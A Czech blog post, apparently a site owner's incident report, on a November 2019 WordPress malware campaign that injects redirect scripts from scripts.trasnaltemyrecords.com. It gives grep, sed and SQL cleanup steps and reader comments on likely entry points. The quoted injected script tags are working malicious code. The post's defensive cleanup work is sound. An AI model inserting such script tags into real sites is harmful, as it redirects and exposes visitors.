Malware "scripts.trasnaltemyrecords.com" a jeho vyčištění

Co se přihodilo?

Dne 6.11.2019 v ranních hodinách se na několika webech objevil malware, který přesměrovává web na reklamní stránky.

V logovacím skriptu jsem objevil, že se pomocí existujícího uživatele někdo připojil z IP adres 185.212.128.231 a 185.212.128.232. Následně nahrál plugin: super-socialat, ten rozbalil a pomocí jeho skriptů se všude roznesly škodlivé kódy.

Sledovací kód se nahrál do všech souborů index.php a to do všech složek.

<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>

Dále se nahrály další typy souborů, ovlivněn je také wp-config soubor, hlavní index.php v rootu WP a také všechny javascriptové soubory v adresářích wp-includes a wp-admin.

Možné příčiny průniku

Vladimír Smitka ze společnosti Lynt.cz analyzoval stovky napadených webů a vše podle něj ukazuje na 3 možné příčiny.

Přečte si více v komentáři zde pod článkem.

Postup pro odstranění malwaru:

Doporučuji zaprvé jít na stránku /wp-admin/update-core.php a přeinstalovat aktuální verzi WordPress. Tím se zbavíte všech infikovaných souborů ve složkách wp-includes a wp-admin.

Připojte se na server přes terminál (SSH), můžete se podívat, které soubory mají v sobě infikovaný kód:

grep -rlw --include="index.php" -e "trasnaltemyrecords" /www/(cesta k vaší WP instalaci)

Dále pak můžete použít tento skript pro smazání výše zmíněného sledovacího kódu ze všech souborů.

grep -rl "<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g"

Dále musíte promazat soubory, které tam nemají co dělat. Je to cca 2-5 php souborů a poznáte je na první pohled. Jsou to názvy jako “wn-SlrBYutdKq.php”, “c8iocdreai.php”, “68i7kau19g.php”, ale tyto názvy budou asi u každého jinak.
Podívejte se do:

hlavní složka instalace
složky /wp-content/uploads/

Tento malware se nahrál i do databáze, do tabulek jako wp_posts a několik dalších. Takže i do obsahu Vašeho webu. SQL příkaz na vymazání nebezpečného kódu nemám, neb jsem měl všude zálohu databáze a mohl jsem ji bez potíží využít.

Měl by však pomoci tento SQL příkaz:

UPDATE wp_posts SET post_content = REPLACE(post_content, “<script src=\’https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043\’ type=\’text/javascript\’></script>”, “”) WHERE post_content LIKE “%<script src=\’https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043\’ type=\’text/javascript\’></script>%”

Je doporučeno ihned změnit heslo do databáze, toto heslo bylo kompromitováno.

Nakonec si tedy ještě zkontrolujte, že tam opravdu plugin super-socialat už není.

09.11.19

Vláďa Smitka

Odpovědět

Analýzou několika stovek napadených webů jsem zatím nalezl 3 různé příčiny:
a) spící backdoor z nějakých starších 0-day zranitelností (https://labs.sucuri.net/malware-campaign-evolves-to-target-new-plugins-may-2019/)
b) útok typu cache poisoning za využití cachovacích pluginů (např. WP Rocket) – jedna z cest, jak tento útok provést byla opravena ve WP 5.2.4
c) neaktualizovaný adminer – verze pod 4.6.3, zmíněná verze 4.2.2 obsahuje ještě mnohem vážnějíší chyby… Vše jsme probírali v CTF cvičení pro WordCamp Praha 2019 – https://2019.prague.wordcamp.org/capture-the-flag-reseni-flagu-9/

09.11.19
Jan Vlasák

Odpovědět

Zdravím a děkuji za doplnění. Aktualizoval jsem článek.
Na sbírání flagu jsem se také podílel, ale tak daleko jsem se tedy nedostal 🙂 Každopádně velké díky za přípravu toho cvičení, muselo dát obrovskou práci a nic podobného pro WP komunitu jsem ještě neviděl.